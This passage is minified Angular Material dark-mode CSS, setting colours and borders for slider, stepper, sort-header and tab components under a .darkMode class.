.mat-slider[_ngcontent-%COMP%]:hover .mat-slider-track-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.cdk-focused[_ngcontent-%COMP%] .mat-slider-track-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-disabled[_ngcontent-%COMP%] .mat-slider-track-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-disabled[_ngcontent-%COMP%] .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-disabled[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]:hover .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#ffffff4d}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-min-value[_ngcontent-%COMP%] .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#ffffff1f}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%] .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%] .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#ffffff4d}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing) .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#ffffff4d;background-color:transparent}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#ffffff4d}.darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover.mat-slider-disabled .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused.mat-slider-disabled .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#ffffff4d}.darkMode[_ngcontent-%COMP%] .mat-slider-has-ticks[_ngcontent-%COMP%] .mat-slider-wrapper[_ngcontent-%COMP%]:after{border-color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-slider-horizontal[_ngcontent-%COMP%] .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to right,rgba(255,255,255,.7),rgba(255,255,255,.7) 2px,transparent 0,transparent);background-image:-moz-repeating-linear-gradient(.0001deg,rgba(255,255,255,.7),rgba(255,255,255,.7) 2px,transparent 0,transparent)}.darkMode[_ngcontent-%COMP%] .mat-slider-vertical[_ngcontent-%COMP%] .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to bottom,rgba(255,255,255,.7),rgba(255,255,255,.7) 2px,transparent 0,transparent)}.darkMode[_ngcontent-%COMP%] .mat-step-header.cdk-keyboard-focused[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-step-header.cdk-program-focused[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%]:hover:not([aria-disabled]), .darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=false]{background-color:#ffffff0a}.darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=true]{cursor:default}@media (hover: none){.darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%]:hover{background:none}}.darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%] .mat-step-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%] .mat-step-optional[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%] .mat-step-icon[_ngcontent-%COMP%]{background-color:#ffffffb3;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%] .mat-step-icon-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%] .mat-step-icon-state-done[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%] .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-step-header.mat-accent[_ngcontent-%COMP%] .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-step-header.mat-accent[_ngcontent-%COMP%] .mat-step-icon-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-step-header.mat-accent[_ngcontent-%COMP%] .mat-step-icon-state-done[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-step-header.mat-accent[_ngcontent-%COMP%] .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-step-header.mat-warn[_ngcontent-%COMP%] .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-step-header.mat-warn[_ngcontent-%COMP%] .mat-step-icon-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-step-header.mat-warn[_ngcontent-%COMP%] .mat-step-icon-state-done[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-step-header.mat-warn[_ngcontent-%COMP%] .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%] .mat-step-icon-state-error[_ngcontent-%COMP%]{background-color:transparent;color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%] .mat-step-label.mat-step-label-active[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-step-header[_ngcontent-%COMP%] .mat-step-label.mat-step-label-error[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-stepper-horizontal[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stepper-vertical[_ngcontent-%COMP%]{background-color:#424242}.darkMode[_ngcontent-%COMP%] .mat-stepper-vertical-line[_ngcontent-%COMP%]:before{border-left-color:#ffffff1f}.darkMode[_ngcontent-%COMP%] .mat-horizontal-stepper-header[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-horizontal-stepper-header[_ngcontent-%COMP%]:after, .darkMode[_ngcontent-%COMP%] .mat-stepper-horizontal-line[_ngcontent-%COMP%]{border-top-color:#ffffff1f}.darkMode[_ngcontent-%COMP%] .mat-sort-header-arrow[_ngcontent-%COMP%]{color:#c6c6c6}.darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-header[_ngcontent-%COMP%]{border-bottom:1px solid rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%] .mat-tab-group-inverted-header[_ngcontent-%COMP%] .mat-tab-nav-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group-inverted-header[_ngcontent-%COMP%] .mat-tab-header[_ngcontent-%COMP%]{border-top:1px solid rgba(255,255,255,.12);border-bottom:none}.darkMode[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-tab-group[class*=mat-background-][_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar[class*=mat-background-][_ngcontent-%COMP%]{border-bottom:none;border-top:none}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-primary[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-accent[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-warn[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > 